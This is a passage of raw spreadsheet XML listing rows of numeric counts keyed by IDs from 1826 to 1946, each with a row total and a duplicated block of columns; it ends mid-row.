    <row r="736" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A736" s="7">
        <v>1826</v>
      </c>
      <c r="B736" s="8">
        <v>30</v>
      </c>
      <c r="C736" s="8">
        <v>0</v>
      </c>
      <c r="D736" s="8">
        <v>0</v>
      </c>
      <c r="E736" s="8">
        <v>0</v>
      </c>
      <c r="F736" s="8">
        <v>3</v>
      </c>
      <c r="G736" s="8">
        <v>0</v>
      </c>
      <c r="H736" s="8">
        <v>33</v>
      </c>
      <c r="K736" s="7">
        <v>1826</v>
      </c>
      <c r="L736" s="8">
        <v>30</v>
      </c>
      <c r="M736" s="8">
        <v>0</v>
      </c>
      <c r="N736" s="8">
        <v>0</v>
      </c>
      <c r="O736" s="8">
        <v>0</v>
      </c>
      <c r="P736" s="8">
        <v>3</v>
      </c>
      <c r="Q736" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="737" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A737" s="7">
        <v>1829</v>
      </c>
      <c r="B737" s="8">
        <v>24</v>
      </c>
      <c r="C737" s="8">
        <v>1</v>
      </c>
      <c r="D737" s="8">
        <v>8</v>
      </c>
      <c r="E737" s="8">
        <v>0</v>
      </c>
      <c r="F737" s="8">
        <v>2</v>
      </c>
      <c r="G737" s="8">
        <v>1</v>
      </c>
      <c r="H737" s="8">
        <v>36</v>
      </c>
      <c r="K737" s="7">
        <v>1829</v>
      </c>
      <c r="L737" s="8">
        <v>24</v>
      </c>
      <c r="M737" s="8">
        <v>1</v>
      </c>
      <c r="N737" s="8">
        <v>8</v>
      </c>
      <c r="O737" s="8">
        <v>0</v>
      </c>
      <c r="P737" s="8">
        <v>2</v>
      </c>
      <c r="Q737" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="738" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A738" s="7">
        <v>1834</v>
      </c>
      <c r="B738" s="8">
        <v>6</v>
      </c>
      <c r="C738" s="8">
        <v>1</v>
      </c>
      <c r="D738" s="8">
        <v>9</v>
      </c>
      <c r="E738" s="8">
        <v>12</v>
      </c>
      <c r="F738" s="8">
        <v>44</v>
      </c>
      <c r="G738" s="8">
        <v>27</v>
      </c>
      <c r="H738" s="8">
        <v>99</v>
      </c>
      <c r="K738" s="7">
        <v>1834</v>
      </c>
      <c r="L738" s="8">
        <v>6</v>
      </c>
      <c r="M738" s="8">
        <v>1</v>
      </c>
      <c r="N738" s="8">
        <v>9</v>
      </c>
      <c r="O738" s="8">
        <v>12</v>
      </c>
      <c r="P738" s="8">
        <v>44</v>
      </c>
      <c r="Q738" s="8">
        <v>27</v>
      </c>
    </row>
    <row r="739" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A739" s="7">
        <v>1835</v>
      </c>
      <c r="B739" s="8">
        <v>20</v>
      </c>
      <c r="C739" s="8">
        <v>0</v>
      </c>
      <c r="D739" s="8">
        <v>0</v>
      </c>
      <c r="E739" s="8">
        <v>2</v>
      </c>
      <c r="F739" s="8">
        <v>3</v>
      </c>
      <c r="G739" s="8">
        <v>4</v>
      </c>
      <c r="H739" s="8">
        <v>29</v>
      </c>
      <c r="K739" s="7">
        <v>1835</v>
      </c>
      <c r="L739" s="8">
        <v>20</v>
      </c>
      <c r="M739" s="8">
        <v>0</v>
      </c>
      <c r="N739" s="8">
        <v>0</v>
      </c>
      <c r="O739" s="8">
        <v>2</v>
      </c>
      <c r="P739" s="8">
        <v>3</v>
      </c>
      <c r="Q739" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="740" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A740" s="7">
        <v>1840</v>
      </c>
      <c r="B740" s="8">
        <v>26</v>
      </c>
      <c r="C740" s="8">
        <v>0</v>
      </c>
      <c r="D740" s="8">
        <v>4</v>
      </c>
      <c r="E740" s="8">
        <v>7</v>
      </c>
      <c r="F740" s="8">
        <v>3</v>
      </c>
      <c r="G740" s="8">
        <v>2</v>
      </c>
      <c r="H740" s="8">
        <v>42</v>
      </c>
      <c r="K740" s="7">
        <v>1840</v>
      </c>
      <c r="L740" s="8">
        <v>26</v>
      </c>
      <c r="M740" s="8">
        <v>0</v>
      </c>
      <c r="N740" s="8">
        <v>4</v>
      </c>
      <c r="O740" s="8">
        <v>7</v>
      </c>
      <c r="P740" s="8">
        <v>3</v>
      </c>
      <c r="Q740" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="741" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A741" s="7">
        <v>1842</v>
      </c>
      <c r="B741" s="8">
        <v>0</v>
      </c>
      <c r="C741" s="8">
        <v>0</v>
      </c>
      <c r="D741" s="8">
        <v>11</v>
      </c>
      <c r="E741" s="8">
        <v>40</v>
      </c>
      <c r="F741" s="8">
        <v>14</v>
      </c>
      <c r="G741" s="8">
        <v>42</v>
      </c>
      <c r="H741" s="8">
        <v>107</v>
      </c>
      <c r="K741" s="7">
        <v>1842</v>
      </c>
      <c r="L741" s="8">
        <v>0</v>
      </c>
      <c r="M741" s="8">
        <v>0</v>
      </c>
      <c r="N741" s="8">
        <v>11</v>
      </c>
      <c r="O741" s="8">
        <v>40</v>
      </c>
      <c r="P741" s="8">
        <v>14</v>
      </c>
      <c r="Q741" s="8">
        <v>42</v>
      </c>
    </row>
    <row r="742" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A742" s="7">
        <v>1844</v>
      </c>
      <c r="B742" s="8">
        <v>26</v>
      </c>
      <c r="C742" s="8">
        <v>1</v>
      </c>
      <c r="D742" s="8">
        <v>40</v>
      </c>
      <c r="E742" s="8">
        <v>32</v>
      </c>
      <c r="F742" s="8">
        <v>0</v>
      </c>
      <c r="G742" s="8">
        <v>2</v>
      </c>
      <c r="H742" s="8">
        <v>101</v>
      </c>
      <c r="K742" s="7">
        <v>1844</v>
      </c>
      <c r="L742" s="8">
        <v>26</v>
      </c>
      <c r="M742" s="8">
        <v>1</v>
      </c>
      <c r="N742" s="8">
        <v>40</v>
      </c>
      <c r="O742" s="8">
        <v>32</v>
      </c>
      <c r="P742" s="8">
        <v>0</v>
      </c>
      <c r="Q742" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="743" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A743" s="7">
        <v>1845</v>
      </c>
      <c r="B743" s="8">
        <v>26</v>
      </c>
      <c r="C743" s="8">
        <v>1</v>
      </c>
      <c r="D743" s="8">
        <v>44</v>
      </c>
      <c r="E743" s="8">
        <v>38</v>
      </c>
      <c r="F743" s="8">
        <v>24</v>
      </c>
      <c r="G743" s="8">
        <v>9</v>
      </c>
      <c r="H743" s="8">
        <v>142</v>
      </c>
      <c r="K743" s="7">
        <v>1845</v>
      </c>
      <c r="L743" s="8">
        <v>26</v>
      </c>
      <c r="M743" s="8">
        <v>1</v>
      </c>
      <c r="N743" s="8">
        <v>44</v>
      </c>
      <c r="O743" s="8">
        <v>38</v>
      </c>
      <c r="P743" s="8">
        <v>24</v>
      </c>
      <c r="Q743" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="744" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A744" s="7">
        <v>1846</v>
      </c>
      <c r="B744" s="8">
        <v>26</v>
      </c>
      <c r="C744" s="8">
        <v>2</v>
      </c>
      <c r="D744" s="8">
        <v>0</v>
      </c>
      <c r="E744" s="8">
        <v>0</v>
      </c>
      <c r="F744" s="8">
        <v>13</v>
      </c>
      <c r="G744" s="8">
        <v>10</v>
      </c>
      <c r="H744" s="8">
        <v>51</v>
      </c>
      <c r="K744" s="7">
        <v>1846</v>
      </c>
      <c r="L744" s="8">
        <v>26</v>
      </c>
      <c r="M744" s="8">
        <v>2</v>
      </c>
      <c r="N744" s="8">
        <v>0</v>
      </c>
      <c r="O744" s="8">
        <v>0</v>
      </c>
      <c r="P744" s="8">
        <v>13</v>
      </c>
      <c r="Q744" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="745" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A745" s="7">
        <v>1848</v>
      </c>
      <c r="B745" s="8">
        <v>25</v>
      </c>
      <c r="C745" s="8">
        <v>2</v>
      </c>
      <c r="D745" s="8">
        <v>2</v>
      </c>
      <c r="E745" s="8">
        <v>2</v>
      </c>
      <c r="F745" s="8">
        <v>15</v>
      </c>
      <c r="G745" s="8">
        <v>12</v>
      </c>
      <c r="H745" s="8">
        <v>58</v>
      </c>
      <c r="K745" s="7">
        <v>1848</v>
      </c>
      <c r="L745" s="8">
        <v>25</v>
      </c>
      <c r="M745" s="8">
        <v>2</v>
      </c>
      <c r="N745" s="8">
        <v>2</v>
      </c>
      <c r="O745" s="8">
        <v>2</v>
      </c>
      <c r="P745" s="8">
        <v>15</v>
      </c>
      <c r="Q745" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="746" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A746" s="7">
        <v>1849</v>
      </c>
      <c r="B746" s="8">
        <v>25</v>
      </c>
      <c r="C746" s="8">
        <v>2</v>
      </c>
      <c r="D746" s="8">
        <v>23</v>
      </c>
      <c r="E746" s="8">
        <v>2</v>
      </c>
      <c r="F746" s="8">
        <v>32</v>
      </c>
      <c r="G746" s="8">
        <v>26</v>
      </c>
      <c r="H746" s="8">
        <v>110</v>
      </c>
      <c r="K746" s="7">
        <v>1849</v>
      </c>
      <c r="L746" s="8">
        <v>25</v>
      </c>
      <c r="M746" s="8">
        <v>2</v>
      </c>
      <c r="N746" s="8">
        <v>23</v>
      </c>
      <c r="O746" s="8">
        <v>2</v>
      </c>
      <c r="P746" s="8">
        <v>32</v>
      </c>
      <c r="Q746" s="8">
        <v>26</v>
      </c>
    </row>
    <row r="747" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A747" s="7">
        <v>1850</v>
      </c>
      <c r="B747" s="8">
        <v>25</v>
      </c>
      <c r="C747" s="8">
        <v>0</v>
      </c>
      <c r="D747" s="8">
        <v>37</v>
      </c>
      <c r="E747" s="8">
        <v>121</v>
      </c>
      <c r="F747" s="8">
        <v>2</v>
      </c>
      <c r="G747" s="8">
        <v>1</v>
      </c>
      <c r="H747" s="8">
        <v>186</v>
      </c>
      <c r="K747" s="7">
        <v>1850</v>
      </c>
      <c r="L747" s="8">
        <v>25</v>
      </c>
      <c r="M747" s="8">
        <v>0</v>
      </c>
      <c r="N747" s="8">
        <v>37</v>
      </c>
      <c r="O747" s="8">
        <v>121</v>
      </c>
      <c r="P747" s="8">
        <v>2</v>
      </c>
      <c r="Q747" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="748" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A748" s="7">
        <v>1851</v>
      </c>
      <c r="B748" s="8">
        <v>5</v>
      </c>
      <c r="C748" s="8">
        <v>0</v>
      </c>
      <c r="D748" s="8">
        <v>0</v>
      </c>
      <c r="E748" s="8">
        <v>0</v>
      </c>
      <c r="F748" s="8">
        <v>0</v>
      </c>
      <c r="G748" s="8">
        <v>7</v>
      </c>
      <c r="H748" s="8">
        <v>12</v>
      </c>
      <c r="K748" s="7">
        <v>1851</v>
      </c>
      <c r="L748" s="8">
        <v>5</v>
      </c>
      <c r="M748" s="8">
        <v>0</v>
      </c>
      <c r="N748" s="8">
        <v>0</v>
      </c>
      <c r="O748" s="8">
        <v>0</v>
      </c>
      <c r="P748" s="8">
        <v>0</v>
      </c>
      <c r="Q748" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="749" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A749" s="7">
        <v>1852</v>
      </c>
      <c r="B749" s="8">
        <v>26</v>
      </c>
      <c r="C749" s="8">
        <v>2</v>
      </c>
      <c r="D749" s="8">
        <v>34</v>
      </c>
      <c r="E749" s="8">
        <v>50</v>
      </c>
      <c r="F749" s="8">
        <v>13</v>
      </c>
      <c r="G749" s="8">
        <v>10</v>
      </c>
      <c r="H749" s="8">
        <v>135</v>
      </c>
      <c r="K749" s="7">
        <v>1852</v>
      </c>
      <c r="L749" s="8">
        <v>26</v>
      </c>
      <c r="M749" s="8">
        <v>2</v>
      </c>
      <c r="N749" s="8">
        <v>34</v>
      </c>
      <c r="O749" s="8">
        <v>50</v>
      </c>
      <c r="P749" s="8">
        <v>13</v>
      </c>
      <c r="Q749" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="750" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A750" s="7">
        <v>1854</v>
      </c>
      <c r="B750" s="8">
        <v>20</v>
      </c>
      <c r="C750" s="8">
        <v>1</v>
      </c>
      <c r="D750" s="8">
        <v>3</v>
      </c>
      <c r="E750" s="8">
        <v>3</v>
      </c>
      <c r="F750" s="8">
        <v>6</v>
      </c>
      <c r="G750" s="8">
        <v>5</v>
      </c>
      <c r="H750" s="8">
        <v>38</v>
      </c>
      <c r="K750" s="7">
        <v>1854</v>
      </c>
      <c r="L750" s="8">
        <v>20</v>
      </c>
      <c r="M750" s="8">
        <v>1</v>
      </c>
      <c r="N750" s="8">
        <v>3</v>
      </c>
      <c r="O750" s="8">
        <v>3</v>
      </c>
      <c r="P750" s="8">
        <v>6</v>
      </c>
      <c r="Q750" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="751" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A751" s="7">
        <v>1858</v>
      </c>
      <c r="B751" s="8">
        <v>25</v>
      </c>
      <c r="C751" s="8">
        <v>1</v>
      </c>
      <c r="D751" s="8">
        <v>5</v>
      </c>
      <c r="E751" s="8">
        <v>5</v>
      </c>
      <c r="F751" s="8">
        <v>6</v>
      </c>
      <c r="G751" s="8">
        <v>3</v>
      </c>
      <c r="H751" s="8">
        <v>45</v>
      </c>
      <c r="K751" s="7">
        <v>1858</v>
      </c>
      <c r="L751" s="8">
        <v>25</v>
      </c>
      <c r="M751" s="8">
        <v>1</v>
      </c>
      <c r="N751" s="8">
        <v>5</v>
      </c>
      <c r="O751" s="8">
        <v>5</v>
      </c>
      <c r="P751" s="8">
        <v>6</v>
      </c>
      <c r="Q751" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="752" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A752" s="7">
        <v>1860</v>
      </c>
      <c r="B752" s="8">
        <v>7</v>
      </c>
      <c r="C752" s="8">
        <v>7</v>
      </c>
      <c r="D752" s="8">
        <v>0</v>
      </c>
      <c r="E752" s="8">
        <v>0</v>
      </c>
      <c r="F752" s="8">
        <v>5</v>
      </c>
      <c r="G752" s="8">
        <v>6</v>
      </c>
      <c r="H752" s="8">
        <v>25</v>
      </c>
      <c r="K752" s="7">
        <v>1860</v>
      </c>
      <c r="L752" s="8">
        <v>7</v>
      </c>
      <c r="M752" s="8">
        <v>7</v>
      </c>
      <c r="N752" s="8">
        <v>0</v>
      </c>
      <c r="O752" s="8">
        <v>0</v>
      </c>
      <c r="P752" s="8">
        <v>5</v>
      </c>
      <c r="Q752" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="753" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A753" s="7">
        <v>1863</v>
      </c>
      <c r="B753" s="8">
        <v>6</v>
      </c>
      <c r="C753" s="8">
        <v>0</v>
      </c>
      <c r="D753" s="8">
        <v>0</v>
      </c>
      <c r="E753" s="8">
        <v>0</v>
      </c>
      <c r="F753" s="8">
        <v>8</v>
      </c>
      <c r="G753" s="8">
        <v>8</v>
      </c>
      <c r="H753" s="8">
        <v>22</v>
      </c>
      <c r="K753" s="7">
        <v>1863</v>
      </c>
      <c r="L753" s="8">
        <v>6</v>
      </c>
      <c r="M753" s="8">
        <v>0</v>
      </c>
      <c r="N753" s="8">
        <v>0</v>
      </c>
      <c r="O753" s="8">
        <v>0</v>
      </c>
      <c r="P753" s="8">
        <v>8</v>
      </c>
      <c r="Q753" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="754" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A754" s="7">
        <v>1865</v>
      </c>
      <c r="B754" s="8">
        <v>58</v>
      </c>
      <c r="C754" s="8">
        <v>2</v>
      </c>
      <c r="D754" s="8">
        <v>16</v>
      </c>
      <c r="E754" s="8">
        <v>0</v>
      </c>
      <c r="F754" s="8">
        <v>13</v>
      </c>
      <c r="G754" s="8">
        <v>4</v>
      </c>
      <c r="H754" s="8">
        <v>93</v>
      </c>
      <c r="K754" s="7">
        <v>1865</v>
      </c>
      <c r="L754" s="8">
        <v>58</v>
      </c>
      <c r="M754" s="8">
        <v>2</v>
      </c>
      <c r="N754" s="8">
        <v>16</v>
      </c>
      <c r="O754" s="8">
        <v>0</v>
      </c>
      <c r="P754" s="8">
        <v>13</v>
      </c>
      <c r="Q754" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="755" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A755" s="7">
        <v>1867</v>
      </c>
      <c r="B755" s="8">
        <v>16</v>
      </c>
      <c r="C755" s="8">
        <v>1</v>
      </c>
      <c r="D755" s="8">
        <v>0</v>
      </c>
      <c r="E755" s="8">
        <v>3</v>
      </c>
      <c r="F755" s="8">
        <v>1</v>
      </c>
      <c r="G755" s="8">
        <v>2</v>
      </c>
      <c r="H755" s="8">
        <v>23</v>
      </c>
      <c r="K755" s="7">
        <v>1867</v>
      </c>
      <c r="L755" s="8">
        <v>16</v>
      </c>
      <c r="M755" s="8">
        <v>1</v>
      </c>
      <c r="N755" s="8">
        <v>0</v>
      </c>
      <c r="O755" s="8">
        <v>3</v>
      </c>
      <c r="P755" s="8">
        <v>1</v>
      </c>
      <c r="Q755" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="756" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A756" s="7">
        <v>1872</v>
      </c>
      <c r="B756" s="8">
        <v>30</v>
      </c>
      <c r="C756" s="8">
        <v>0</v>
      </c>
      <c r="D756" s="8">
        <v>2</v>
      </c>
      <c r="E756" s="8">
        <v>0</v>
      </c>
      <c r="F756" s="8">
        <v>5</v>
      </c>
      <c r="G756" s="8">
        <v>0</v>
      </c>
      <c r="H756" s="8">
        <v>37</v>
      </c>
      <c r="K756" s="7">
        <v>1872</v>
      </c>
      <c r="L756" s="8">
        <v>30</v>
      </c>
      <c r="M756" s="8">
        <v>0</v>
      </c>
      <c r="N756" s="8">
        <v>2</v>
      </c>
      <c r="O756" s="8">
        <v>0</v>
      </c>
      <c r="P756" s="8">
        <v>5</v>
      </c>
      <c r="Q756" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="757" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A757" s="7">
        <v>1876</v>
      </c>
      <c r="B757" s="8">
        <v>25</v>
      </c>
      <c r="C757" s="8">
        <v>1</v>
      </c>
      <c r="D757" s="8">
        <v>0</v>
      </c>
      <c r="E757" s="8">
        <v>0</v>
      </c>
      <c r="F757" s="8">
        <v>9</v>
      </c>
      <c r="G757" s="8">
        <v>16</v>
      </c>
      <c r="H757" s="8">
        <v>51</v>
      </c>
      <c r="K757" s="7">
        <v>1876</v>
      </c>
      <c r="L757" s="8">
        <v>25</v>
      </c>
      <c r="M757" s="8">
        <v>1</v>
      </c>
      <c r="N757" s="8">
        <v>0</v>
      </c>
      <c r="O757" s="8">
        <v>0</v>
      </c>
      <c r="P757" s="8">
        <v>9</v>
      </c>
      <c r="Q757" s="8">
        <v>16</v>
      </c>
    </row>
    <row r="758" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A758" s="7">
        <v>1877</v>
      </c>
      <c r="B758" s="8">
        <v>26</v>
      </c>
      <c r="C758" s="8">
        <v>0</v>
      </c>
      <c r="D758" s="8">
        <v>0</v>
      </c>
      <c r="E758" s="8">
        <v>11</v>
      </c>
      <c r="F758" s="8">
        <v>2</v>
      </c>
      <c r="G758" s="8">
        <v>1</v>
      </c>
      <c r="H758" s="8">
        <v>40</v>
      </c>
      <c r="K758" s="7">
        <v>1877</v>
      </c>
      <c r="L758" s="8">
        <v>26</v>
      </c>
      <c r="M758" s="8">
        <v>0</v>
      </c>
      <c r="N758" s="8">
        <v>0</v>
      </c>
      <c r="O758" s="8">
        <v>11</v>
      </c>
      <c r="P758" s="8">
        <v>2</v>
      </c>
      <c r="Q758" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="759" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A759" s="7">
        <v>1890</v>
      </c>
      <c r="B759" s="8">
        <v>24</v>
      </c>
      <c r="C759" s="8">
        <v>8</v>
      </c>
      <c r="D759" s="8">
        <v>20</v>
      </c>
      <c r="E759" s="8">
        <v>0</v>
      </c>
      <c r="F759" s="8">
        <v>13</v>
      </c>
      <c r="G759" s="8">
        <v>2</v>
      </c>
      <c r="H759" s="8">
        <v>67</v>
      </c>
      <c r="K759" s="7">
        <v>1890</v>
      </c>
      <c r="L759" s="8">
        <v>24</v>
      </c>
      <c r="M759" s="8">
        <v>8</v>
      </c>
      <c r="N759" s="8">
        <v>20</v>
      </c>
      <c r="O759" s="8">
        <v>0</v>
      </c>
      <c r="P759" s="8">
        <v>13</v>
      </c>
      <c r="Q759" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="760" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A760" s="7">
        <v>1891</v>
      </c>
      <c r="B760" s="8">
        <v>26</v>
      </c>
      <c r="C760" s="8">
        <v>1</v>
      </c>
      <c r="D760" s="8">
        <v>4</v>
      </c>
      <c r="E760" s="8">
        <v>0</v>
      </c>
      <c r="F760" s="8">
        <v>130</v>
      </c>
      <c r="G760" s="8">
        <v>52</v>
      </c>
      <c r="H760" s="8">
        <v>213</v>
      </c>
      <c r="K760" s="7">
        <v>1891</v>
      </c>
      <c r="L760" s="8">
        <v>26</v>
      </c>
      <c r="M760" s="8">
        <v>1</v>
      </c>
      <c r="N760" s="8">
        <v>4</v>
      </c>
      <c r="O760" s="8">
        <v>0</v>
      </c>
      <c r="P760" s="8">
        <v>130</v>
      </c>
      <c r="Q760" s="8">
        <v>52</v>
      </c>
    </row>
    <row r="761" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A761" s="7">
        <v>1895</v>
      </c>
      <c r="B761" s="8">
        <v>28</v>
      </c>
      <c r="C761" s="8">
        <v>1</v>
      </c>
      <c r="D761" s="8">
        <v>0</v>
      </c>
      <c r="E761" s="8">
        <v>2</v>
      </c>
      <c r="F761" s="8">
        <v>8</v>
      </c>
      <c r="G761" s="8">
        <v>0</v>
      </c>
      <c r="H761" s="8">
        <v>39</v>
      </c>
      <c r="K761" s="7">
        <v>1895</v>
      </c>
      <c r="L761" s="8">
        <v>28</v>
      </c>
      <c r="M761" s="8">
        <v>1</v>
      </c>
      <c r="N761" s="8">
        <v>0</v>
      </c>
      <c r="O761" s="8">
        <v>2</v>
      </c>
      <c r="P761" s="8">
        <v>8</v>
      </c>
      <c r="Q761" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="762" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A762" s="7">
        <v>1902</v>
      </c>
      <c r="B762" s="8">
        <v>26</v>
      </c>
      <c r="C762" s="8">
        <v>1</v>
      </c>
      <c r="D762" s="8">
        <v>40</v>
      </c>
      <c r="E762" s="8">
        <v>4</v>
      </c>
      <c r="F762" s="8">
        <v>4</v>
      </c>
      <c r="G762" s="8">
        <v>10</v>
      </c>
      <c r="H762" s="8">
        <v>85</v>
      </c>
      <c r="K762" s="7">
        <v>1902</v>
      </c>
      <c r="L762" s="8">
        <v>26</v>
      </c>
      <c r="M762" s="8">
        <v>1</v>
      </c>
      <c r="N762" s="8">
        <v>40</v>
      </c>
      <c r="O762" s="8">
        <v>4</v>
      </c>
      <c r="P762" s="8">
        <v>4</v>
      </c>
      <c r="Q762" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="763" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A763" s="7">
        <v>1912</v>
      </c>
      <c r="B763" s="8">
        <v>24</v>
      </c>
      <c r="C763" s="8">
        <v>0</v>
      </c>
      <c r="D763" s="8">
        <v>0</v>
      </c>
      <c r="E763" s="8">
        <v>0</v>
      </c>
      <c r="F763" s="8">
        <v>13</v>
      </c>
      <c r="G763" s="8">
        <v>0</v>
      </c>
      <c r="H763" s="8">
        <v>37</v>
      </c>
      <c r="K763" s="7">
        <v>1912</v>
      </c>
      <c r="L763" s="8">
        <v>24</v>
      </c>
      <c r="M763" s="8">
        <v>0</v>
      </c>
      <c r="N763" s="8">
        <v>0</v>
      </c>
      <c r="O763" s="8">
        <v>0</v>
      </c>
      <c r="P763" s="8">
        <v>13</v>
      </c>
      <c r="Q763" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="764" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A764" s="7">
        <v>1917</v>
      </c>
      <c r="B764" s="8">
        <v>25</v>
      </c>
      <c r="C764" s="8">
        <v>1</v>
      </c>
      <c r="D764" s="8">
        <v>31</v>
      </c>
      <c r="E764" s="8">
        <v>16</v>
      </c>
      <c r="F764" s="8">
        <v>6</v>
      </c>
      <c r="G764" s="8">
        <v>3</v>
      </c>
      <c r="H764" s="8">
        <v>82</v>
      </c>
      <c r="K764" s="7">
        <v>1917</v>
      </c>
      <c r="L764" s="8">
        <v>25</v>
      </c>
      <c r="M764" s="8">
        <v>1</v>
      </c>
      <c r="N764" s="8">
        <v>31</v>
      </c>
      <c r="O764" s="8">
        <v>16</v>
      </c>
      <c r="P764" s="8">
        <v>6</v>
      </c>
      <c r="Q764" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="765" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A765" s="7">
        <v>1918</v>
      </c>
      <c r="B765" s="8">
        <v>43</v>
      </c>
      <c r="C765" s="8">
        <v>1</v>
      </c>
      <c r="D765" s="8">
        <v>43</v>
      </c>
      <c r="E765" s="8">
        <v>5</v>
      </c>
      <c r="F765" s="8">
        <v>22</v>
      </c>
      <c r="G765" s="8">
        <v>8</v>
      </c>
      <c r="H765" s="8">
        <v>122</v>
      </c>
      <c r="K765" s="7">
        <v>1918</v>
      </c>
      <c r="L765" s="8">
        <v>43</v>
      </c>
      <c r="M765" s="8">
        <v>1</v>
      </c>
      <c r="N765" s="8">
        <v>43</v>
      </c>
      <c r="O765" s="8">
        <v>5</v>
      </c>
      <c r="P765" s="8">
        <v>22</v>
      </c>
      <c r="Q765" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="766" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A766" s="7">
        <v>1933</v>
      </c>
      <c r="B766" s="8">
        <v>20</v>
      </c>
      <c r="C766" s="8">
        <v>0</v>
      </c>
      <c r="D766" s="8">
        <v>16</v>
      </c>
      <c r="E766" s="8">
        <v>74</v>
      </c>
      <c r="F766" s="8">
        <v>12</v>
      </c>
      <c r="G766" s="8">
        <v>18</v>
      </c>
      <c r="H766" s="8">
        <v>140</v>
      </c>
      <c r="K766" s="7">
        <v>1933</v>
      </c>
      <c r="L766" s="8">
        <v>20</v>
      </c>
      <c r="M766" s="8">
        <v>0</v>
      </c>
      <c r="N766" s="8">
        <v>16</v>
      </c>
      <c r="O766" s="8">
        <v>74</v>
      </c>
      <c r="P766" s="8">
        <v>12</v>
      </c>
      <c r="Q766" s="8">
        <v>18</v>
      </c>
    </row>
    <row r="767" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A767" s="7">
        <v>1937</v>
      </c>
      <c r="B767" s="8">
        <v>25</v>
      </c>
      <c r="C767" s="8">
        <v>0</v>
      </c>
      <c r="D767" s="8">
        <v>6</v>
      </c>
      <c r="E767" s="8">
        <v>0</v>
      </c>
      <c r="F767" s="8">
        <v>4</v>
      </c>
      <c r="G767" s="8">
        <v>2</v>
      </c>
      <c r="H767" s="8">
        <v>37</v>
      </c>
      <c r="K767" s="7">
        <v>1937</v>
      </c>
      <c r="L767" s="8">
        <v>25</v>
      </c>
      <c r="M767" s="8">
        <v>0</v>
      </c>
      <c r="N767" s="8">
        <v>6</v>
      </c>
      <c r="O767" s="8">
        <v>0</v>
      </c>
      <c r="P767" s="8">
        <v>4</v>
      </c>
      <c r="Q767" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="768" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A768" s="7">
        <v>1939</v>
      </c>
      <c r="B768" s="8">
        <v>20</v>
      </c>
      <c r="C768" s="8">
        <v>1</v>
      </c>
      <c r="D768" s="8">
        <v>2</v>
      </c>
      <c r="E768" s="8">
        <v>8</v>
      </c>
      <c r="F768" s="8">
        <v>3</v>
      </c>
      <c r="G768" s="8">
        <v>2</v>
      </c>
      <c r="H768" s="8">
        <v>36</v>
      </c>
      <c r="K768" s="7">
        <v>1939</v>
      </c>
      <c r="L768" s="8">
        <v>20</v>
      </c>
      <c r="M768" s="8">
        <v>1</v>
      </c>
      <c r="N768" s="8">
        <v>2</v>
      </c>
      <c r="O768" s="8">
        <v>8</v>
      </c>
      <c r="P768" s="8">
        <v>3</v>
      </c>
      <c r="Q768" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="769" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A769" s="7">
        <v>1946</v>
      </c>
      <c r="B769" s="8">
        <v>26</v>
      </c>
      <c r="C769" s="8">
        <v>0</v>
      </c>
      <c r="D769" s="8">
        <v>0</v>
      </c>
      <c r="E769" s="8">
        <v>0</v>
      </c>
      <c r="F769" s="8">
        <v>32</v>
      </c>
      <c r="G769" s="8">
        <v>10</v>
      </c>
      <c r="H769" s="8">
        <v>68</v>
      </c>
      <c r="K769" s="7">
        <v>1946</v>
      </c>
      <c r="L769" s="8">
        <v>26</v>
      </c>
      <c r="M769" s="8">
        <v>0</v>
      </c>
      <c r="N769" s="8">
        <v>0</v>
      </c>
      <c r="O769" s="8">
        <v>0</v>
